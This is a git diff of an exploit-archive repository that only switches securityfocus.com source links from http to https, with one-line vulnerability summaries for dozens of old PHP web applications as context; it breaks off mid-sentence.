a/exploits/php/webapps/28302.txt b/exploits/php/webapps/28302.txt index 47a8b07ce..c4ad4527f 100644 --- a/exploits/php/webapps/28302.txt +++ b/exploits/php/webapps/28302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19234/info +source: https://www.securityfocus.com/bid/19234/info Liga Manager Online Joomla! Component is prone to a remote file-include vulnerability. diff --git a/exploits/php/webapps/28303.txt b/exploits/php/webapps/28303.txt index 8c44ff918..f63cc7c11 100644 --- a/exploits/php/webapps/28303.txt +++ b/exploits/php/webapps/28303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19235/info +source: https://www.securityfocus.com/bid/19235/info X-Protection is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28304.txt b/exploits/php/webapps/28304.txt index aaf07427b..7ccb46e50 100644 --- a/exploits/php/webapps/28304.txt +++ b/exploits/php/webapps/28304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19236/info +source: https://www.securityfocus.com/bid/19236/info X-Poll is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28305.txt b/exploits/php/webapps/28305.txt index 1669cb7e5..c822ffd10 100644 --- a/exploits/php/webapps/28305.txt +++ b/exploits/php/webapps/28305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19238/info +source: https://www.securityfocus.com/bid/19238/info AJAX Chat is prone to both a directory-traversal vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28306.txt b/exploits/php/webapps/28306.txt index 1a3b3508e..2d70a660c 100644 --- a/exploits/php/webapps/28306.txt +++ b/exploits/php/webapps/28306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19240/info +source: https://www.securityfocus.com/bid/19240/info PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28307.txt b/exploits/php/webapps/28307.txt index 4d693c263..d9842168d 100644 --- a/exploits/php/webapps/28307.txt +++ b/exploits/php/webapps/28307.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19240/info +source: https://www.securityfocus.com/bid/19240/info PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28308.txt b/exploits/php/webapps/28308.txt index c4df13600..a2d0a0d2e 100644 --- a/exploits/php/webapps/28308.txt +++ b/exploits/php/webapps/28308.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19240/info +source: https://www.securityfocus.com/bid/19240/info PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28309.txt b/exploits/php/webapps/28309.txt index 95ae11d4d..6939fd465 100644 --- a/exploits/php/webapps/28309.txt +++ b/exploits/php/webapps/28309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19244/info +source: https://www.securityfocus.com/bid/19244/info Seir Anphin V666 Community Management System is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28310.txt b/exploits/php/webapps/28310.txt index 23dbb61d9..332771928 100644 --- a/exploits/php/webapps/28310.txt +++ b/exploits/php/webapps/28310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19245/info +source: https://www.securityfocus.com/bid/19245/info Moskool is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28311.txt b/exploits/php/webapps/28311.txt index 077188f6f..da9704b5c 100644 --- a/exploits/php/webapps/28311.txt +++ b/exploits/php/webapps/28311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19246/info +source: https://www.securityfocus.com/bid/19246/info myEvent is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28315.txt b/exploits/php/webapps/28315.txt index 9e6bcffc9..624c5fffc 100644 --- a/exploits/php/webapps/28315.txt +++ b/exploits/php/webapps/28315.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19256/info +source: https://www.securityfocus.com/bid/19256/info Help Center Live is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28316.txt b/exploits/php/webapps/28316.txt index 2773a3805..4822a56d9 100644 --- a/exploits/php/webapps/28316.txt +++ b/exploits/php/webapps/28316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19260/info +source: https://www.securityfocus.com/bid/19260/info TinyPHPForum is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28317.txt b/exploits/php/webapps/28317.txt index 0e03e5415..a4753a86d 100644 --- a/exploits/php/webapps/28317.txt +++ b/exploits/php/webapps/28317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19269/info +source: https://www.securityfocus.com/bid/19269/info WoW Roster is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28318.txt b/exploits/php/webapps/28318.txt index 2736e15dd..19d7eacc6 100644 --- a/exploits/php/webapps/28318.txt +++ b/exploits/php/webapps/28318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19271/info +source: https://www.securityfocus.com/bid/19271/info Quickie is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28319.txt b/exploits/php/webapps/28319.txt index 6f2d91473..aea42a285 100644 --- a/exploits/php/webapps/28319.txt +++ b/exploits/php/webapps/28319.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19272/info +source: https://www.securityfocus.com/bid/19272/info FAQ Script is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28320.txt b/exploits/php/webapps/28320.txt index d844c7afd..9cbd02ea3 100644 --- a/exploits/php/webapps/28320.txt +++ b/exploits/php/webapps/28320.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19274/info +source: https://www.securityfocus.com/bid/19274/info GuestBook is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28322.txt b/exploits/php/webapps/28322.txt index 1ec81a543..98200414b 100644 --- a/exploits/php/webapps/28322.txt +++ b/exploits/php/webapps/28322.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19278/info +source: https://www.securityfocus.com/bid/19278/info TinyPHPForum is prone to an information-disclosure vulnerability. This issue arises when a script allows a remote untrusted source to change a victim user's email address, and have their login credentials returned to an attacker. diff --git a/exploits/php/webapps/28323.txt b/exploits/php/webapps/28323.txt index 399e90072..bafd2a186 100644 --- a/exploits/php/webapps/28323.txt +++ b/exploits/php/webapps/28323.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19281/info +source: https://www.securityfocus.com/bid/19281/info TinyPHPForum is prone to an authentication-bypass vulnerability because it fails to prevent an attacker from accessing admin scripts directly without requiring authentication. diff --git a/exploits/php/webapps/28324.txt b/exploits/php/webapps/28324.txt index 73c6963f4..6239c2783 100644 --- a/exploits/php/webapps/28324.txt +++ b/exploits/php/webapps/28324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19308/info +source: https://www.securityfocus.com/bid/19308/info Blackboard products are prone to multiple HTML-injection vulnerabilities because the software fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/28326.txt b/exploits/php/webapps/28326.txt index d7df405f8..d65c82479 100644 --- a/exploits/php/webapps/28326.txt +++ b/exploits/php/webapps/28326.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19327/info +source: https://www.securityfocus.com/bid/19327/info Vwar is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. These issues occur because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28327.txt b/exploits/php/webapps/28327.txt index a972170a7..58ecbe614 100644 --- a/exploits/php/webapps/28327.txt +++ b/exploits/php/webapps/28327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19327/info +source: https://www.securityfocus.com/bid/19327/info Vwar is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues. These issues occur because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28342.txt b/exploits/php/webapps/28342.txt index 1b80708dd..fa1df1015 100644 --- a/exploits/php/webapps/28342.txt +++ b/exploits/php/webapps/28342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19358/info +source: https://www.securityfocus.com/bid/19358/info vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28347.txt b/exploits/php/webapps/28347.txt index 2494947ab..776ca0670 100644 --- a/exploits/php/webapps/28347.txt +++ b/exploits/php/webapps/28347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19374/info +source: https://www.securityfocus.com/bid/19374/info XennoBB is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28349.txt b/exploits/php/webapps/28349.txt index 356053135..ebb93576e 100644 --- a/exploits/php/webapps/28349.txt +++ b/exploits/php/webapps/28349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19382/info +source: https://www.securityfocus.com/bid/19382/info PHP Simple Shop is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/28350.txt b/exploits/php/webapps/28350.txt index 5ec60895f..0f36bf667 100644 --- a/exploits/php/webapps/28350.txt +++ b/exploits/php/webapps/28350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28351.txt b/exploits/php/webapps/28351.txt index b4ad3217d..d6cc6838d 100644 --- a/exploits/php/webapps/28351.txt +++ b/exploits/php/webapps/28351.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28352.txt b/exploits/php/webapps/28352.txt index 43f843aa5..916de2d02 100644 --- a/exploits/php/webapps/28352.txt +++ b/exploits/php/webapps/28352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28353.txt b/exploits/php/webapps/28353.txt index ffa9a9594..8e98736ae 100644 --- a/exploits/php/webapps/28353.txt +++ b/exploits/php/webapps/28353.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28354.txt b/exploits/php/webapps/28354.txt index 4e0a9f207..8711b8ecf 100644 --- a/exploits/php/webapps/28354.txt +++ b/exploits/php/webapps/28354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28355.txt b/exploits/php/webapps/28355.txt index 3001c8818..f8ff0ef47 100644 --- a/exploits/php/webapps/28355.txt +++ b/exploits/php/webapps/28355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28356.txt b/exploits/php/webapps/28356.txt index 40a7827b1..f8a223bb4 100644 --- a/exploits/php/webapps/28356.txt +++ b/exploits/php/webapps/28356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19387/info +source: https://www.securityfocus.com/bid/19387/info VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28359.txt b/exploits/php/webapps/28359.txt index 108a370b7..e081d90f7 100644 --- a/exploits/php/webapps/28359.txt +++ b/exploits/php/webapps/28359.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19397/info +source: https://www.securityfocus.com/bid/19397/info phpPrintAnalyzer is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28362.txt b/exploits/php/webapps/28362.txt index 7b5bb1f3d..92380e899 100644 --- a/exploits/php/webapps/28362.txt +++ b/exploits/php/webapps/28362.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19437/info +source: https://www.securityfocus.com/bid/19437/info Simple one-file guestbook is prone to a security-bypass vulnerability. An attacker can bypass authentication measures by using a specific URL to delete all guestbook entries. diff --git a/exploits/php/webapps/28363.txt b/exploits/php/webapps/28363.txt index 50740a01d..df5625ff1 100644 --- a/exploits/php/webapps/28363.txt +++ b/exploits/php/webapps/28363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19442/info +source: https://www.securityfocus.com/bid/19442/info CLUB-Nuke is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28364.txt b/exploits/php/webapps/28364.txt index 321d68312..75b23cc31 100644 --- a/exploits/php/webapps/28364.txt +++ b/exploits/php/webapps/28364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19446/info +source: https://www.securityfocus.com/bid/19446/info XennoBB is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28366.txt b/exploits/php/webapps/28366.txt index 2b6b0a90f..59e21f14e 100644 --- a/exploits/php/webapps/28366.txt +++ b/exploits/php/webapps/28366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19449/info +source: https://www.securityfocus.com/bid/19449/info MyBloggie is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28370.txt b/exploits/php/webapps/28370.txt index 0a01b2fa1..5187efa37 100644 --- a/exploits/php/webapps/28370.txt +++ b/exploits/php/webapps/28370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19458/info +source: https://www.securityfocus.com/bid/19458/info Mafia Moblog is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28371.txt b/exploits/php/webapps/28371.txt index d85c9707e..d7f8ebee9 100644 --- a/exploits/php/webapps/28371.txt +++ b/exploits/php/webapps/28371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19460/info +source: https://www.securityfocus.com/bid/19460/info A cross-site scripting vulnerability affects YaBBSE because the application fails to properly sanitize user-supplied input before including it in dynamically generated web content. diff --git a/exploits/php/webapps/28372.txt b/exploits/php/webapps/28372.txt index b55dcd005..67c917229 100644 --- a/exploits/php/webapps/28372.txt +++ b/exploits/php/webapps/28372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19462/info +source: https://www.securityfocus.com/bid/19462/info Tiny Web Gallery is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28378.txt b/exploits/php/webapps/28378.txt index d70c8de27..ba1948541 100644 --- a/exploits/php/webapps/28378.txt +++ b/exploits/php/webapps/28378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19476/info +source: https://www.securityfocus.com/bid/19476/info miniBloggie is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28379.txt b/exploits/php/webapps/28379.txt index e24140274..503fc48b9 100644 --- a/exploits/php/webapps/28379.txt +++ b/exploits/php/webapps/28379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19477/info +source: https://www.securityfocus.com/bid/19477/info WEBinsta Mailing List Manager is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28382.txt b/exploits/php/webapps/28382.txt index 059ce6d68..323e3a096 100644 --- a/exploits/php/webapps/28382.txt +++ b/exploits/php/webapps/28382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19504/info +source: https://www.securityfocus.com/bid/19504/info WP-DB Backup For Wordpress is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28388.txt b/exploits/php/webapps/28388.txt index 72e33af77..9db17675a 100644 --- a/exploits/php/webapps/28388.txt +++ b/exploits/php/webapps/28388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19525/info +source: https://www.securityfocus.com/bid/19525/info PHP-Nuke AutoHTML Module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28390.txt b/exploits/php/webapps/28390.txt index d6c4ef09f..f53610191 100644 --- a/exploits/php/webapps/28390.txt +++ b/exploits/php/webapps/28390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19533/info +source: https://www.securityfocus.com/bid/19533/info Lizge is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28392.txt b/exploits/php/webapps/28392.txt index d62a1cc41..c51c51ef1 100644 --- a/exploits/php/webapps/28392.txt +++ b/exploits/php/webapps/28392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19543/info +source: https://www.securityfocus.com/bid/19543/info Zen Cart is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28394.pl b/exploits/php/webapps/28394.pl index 9eb1a5c29..a112e8c8e 100755 --- a/exploits/php/webapps/28394.pl +++ b/exploits/php/webapps/28394.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19546/info +source: https://www.securityfocus.com/bid/19546/info Fusion News is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28396.txt b/exploits/php/webapps/28396.txt index 21a5c02db..f4ea87648 100644 --- a/exploits/php/webapps/28396.txt +++ b/exploits/php/webapps/28396.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19553/info +source: https://www.securityfocus.com/bid/19553/info Reporter (a Mambo component) is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28399.txt b/exploits/php/webapps/28399.txt index 95cdbaf57..7436a583d 100644 --- a/exploits/php/webapps/28399.txt +++ b/exploits/php/webapps/28399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19563/info +source: https://www.securityfocus.com/bid/19563/info CubeCart is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28402.txt b/exploits/php/webapps/28402.txt index 661598ca5..a2ff1cc55 100644 --- a/exploits/php/webapps/28402.txt +++ b/exploits/php/webapps/28402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19577/info +source: https://www.securityfocus.com/bid/19577/info Blog:CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28403.txt b/exploits/php/webapps/28403.txt index 4fb1aa38f..8ed62c741 100644 --- a/exploits/php/webapps/28403.txt +++ b/exploits/php/webapps/28403.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19584/info +source: https://www.securityfocus.com/bid/19584/info The lmtg_myhomepage component for Mambo is prone multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28404.txt b/exploits/php/webapps/28404.txt index 56e04aa67..6a50b9175 100644 --- a/exploits/php/webapps/28404.txt +++ b/exploits/php/webapps/28404.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19593/info +source: https://www.securityfocus.com/bid/19593/info The Mambo Rssxt component for Joomla and Mambo is prone multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28406.txt b/exploits/php/webapps/28406.txt index db8edd421..a2e845aa3 100644 --- a/exploits/php/webapps/28406.txt +++ b/exploits/php/webapps/28406.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19606/info +source: https://www.securityfocus.com/bid/19606/info XennoBB is prone to an SQL-injection vulnerability that could allow an attacker to influence the structure or logic of SQL queries made by the application. diff --git a/exploits/php/webapps/28410.txt b/exploits/php/webapps/28410.txt index ed28a859f..4db58d50a 100644 --- a/exploits/php/webapps/28410.txt +++ b/exploits/php/webapps/28410.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19621/info +source: https://www.securityfocus.com/bid/19621/info The Mambo Display MOSBot Manager component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28411.txt b/exploits/php/webapps/28411.txt index 2a8eabb74..fae110818 100644 --- a/exploits/php/webapps/28411.txt +++ b/exploits/php/webapps/28411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19622/info +source: https://www.securityfocus.com/bid/19622/info Multiple cross-site scripting vulnerabilities affect Job Site because the application fails to properly sanitize user-supplied input before including it in dynamically generated web content. diff --git a/exploits/php/webapps/28412.txt b/exploits/php/webapps/28412.txt index 01a6f9151..ed9c4a333 100644 --- a/exploits/php/webapps/28412.txt +++ b/exploits/php/webapps/28412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19623/info +source: https://www.securityfocus.com/bid/19623/info DieselPay is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28413.txt b/exploits/php/webapps/28413.txt index 1c2d6d6c0..0c8b838c5 100644 --- a/exploits/php/webapps/28413.txt +++ b/exploits/php/webapps/28413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19624/info +source: https://www.securityfocus.com/bid/19624/info cPanel is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/28414.txt b/exploits/php/webapps/28414.txt index f146ef13f..26f262d8b 100644 --- a/exploits/php/webapps/28414.txt +++ b/exploits/php/webapps/28414.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19624/info +source: https://www.securityfocus.com/bid/19624/info cPanel is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/28415.txt b/exploits/php/webapps/28415.txt index ca1e9268d..6946473fb 100644 --- a/exploits/php/webapps/28415.txt +++ b/exploits/php/webapps/28415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19624/info +source: https://www.securityfocus.com/bid/19624/info cPanel is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/28416.txt b/exploits/php/webapps/28416.txt index bc113b2c7..e28a80a69 100644 --- a/exploits/php/webapps/28416.txt +++ b/exploits/php/webapps/28416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19625/info +source: https://www.securityfocus.com/bid/19625/info The Mambo EstateAgent component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28417.txt b/exploits/php/webapps/28417.txt index 51f5227f5..d84a2c2e3 100644 --- a/exploits/php/webapps/28417.txt +++ b/exploits/php/webapps/28417.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19626/info +source: https://www.securityfocus.com/bid/19626/info ToendaCMS is prone a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28418.txt b/exploits/php/webapps/28418.txt index 595c76b6a..9a3e87d15 100644 --- a/exploits/php/webapps/28418.txt +++ b/exploits/php/webapps/28418.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19628/info +source: https://www.securityfocus.com/bid/19628/info Multiple remote file-include vulnerabilities affect the Content Management module for PHProjekt because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. diff --git a/exploits/php/webapps/28419.txt b/exploits/php/webapps/28419.txt index d7b718858..d83d18401 100644 --- a/exploits/php/webapps/28419.txt +++ b/exploits/php/webapps/28419.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19630/info +source: https://www.securityfocus.com/bid/19630/info Smart Traffic is prone a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28422.txt b/exploits/php/webapps/28422.txt index ac897194a..ad56cbeff 100644 --- a/exploits/php/webapps/28422.txt +++ b/exploits/php/webapps/28422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19646/info +source: https://www.securityfocus.com/bid/19646/info Paid Mail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28423.txt b/exploits/php/webapps/28423.txt index 1c7953b69..bbbff71f0 100644 --- a/exploits/php/webapps/28423.txt +++ b/exploits/php/webapps/28423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19658/info +source: https://www.securityfocus.com/bid/19658/info RedBLoG is prone a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28426.txt b/exploits/php/webapps/28426.txt index 377434720..c689c173b 100644 --- a/exploits/php/webapps/28426.txt +++ b/exploits/php/webapps/28426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19663/info +source: https://www.securityfocus.com/bid/19663/info Multiple remote file-include vulnerabilities affect HPE because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. diff --git a/exploits/php/webapps/28428.txt b/exploits/php/webapps/28428.txt index 792a02f7f..130d90bf7 100644 --- a/exploits/php/webapps/28428.txt +++ b/exploits/php/webapps/28428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19709/info +source: https://www.securityfocus.com/bid/19709/info Yapig is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This may let an attacker steal cookie-based authentication credentials and launch other attacks. diff --git a/exploits/php/webapps/28429.js b/exploits/php/webapps/28429.js index ac44b0d83..f6e3d9e3b 100644 --- a/exploits/php/webapps/28429.js +++ b/exploits/php/webapps/28429.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19718/info +source: https://www.securityfocus.com/bid/19718/info MyBB is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/28430.txt b/exploits/php/webapps/28430.txt index b00a7fd91..d08f36bca 100644 --- a/exploits/php/webapps/28430.txt +++ b/exploits/php/webapps/28430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19721/info +source: https://www.securityfocus.com/bid/19721/info Jupiter CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28431.txt b/exploits/php/webapps/28431.txt index d1d8e2cb3..6e8ef9c0c 100644 --- a/exploits/php/webapps/28431.txt +++ b/exploits/php/webapps/28431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19722/info +source: https://www.securityfocus.com/bid/19722/info Jetbox CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28432.txt b/exploits/php/webapps/28432.txt index 1974709f4..3f7000b48 100644 --- a/exploits/php/webapps/28432.txt +++ b/exploits/php/webapps/28432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19723/info +source: https://www.securityfocus.com/bid/19723/info Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28433.txt b/exploits/php/webapps/28433.txt index 09ae4de8b..cfe3264bd 100644 --- a/exploits/php/webapps/28433.txt +++ b/exploits/php/webapps/28433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19723/info +source: https://www.securityfocus.com/bid/19723/info Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28434.txt b/exploits/php/webapps/28434.txt index 861620e97..7e50e1923 100644 --- a/exploits/php/webapps/28434.txt +++ b/exploits/php/webapps/28434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19723/info +source: https://www.securityfocus.com/bid/19723/info Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28435.txt b/exploits/php/webapps/28435.txt index addfadc23..35108794d 100644 --- a/exploits/php/webapps/28435.txt +++ b/exploits/php/webapps/28435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19723/info +source: https://www.securityfocus.com/bid/19723/info Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28436.txt b/exploits/php/webapps/28436.txt index 45fef193c..5bfc3b6ef 100644 --- a/exploits/php/webapps/28436.txt +++ b/exploits/php/webapps/28436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19724/info +source: https://www.securityfocus.com/bid/19724/info AlstraSoft Video Share Enterprise is prone 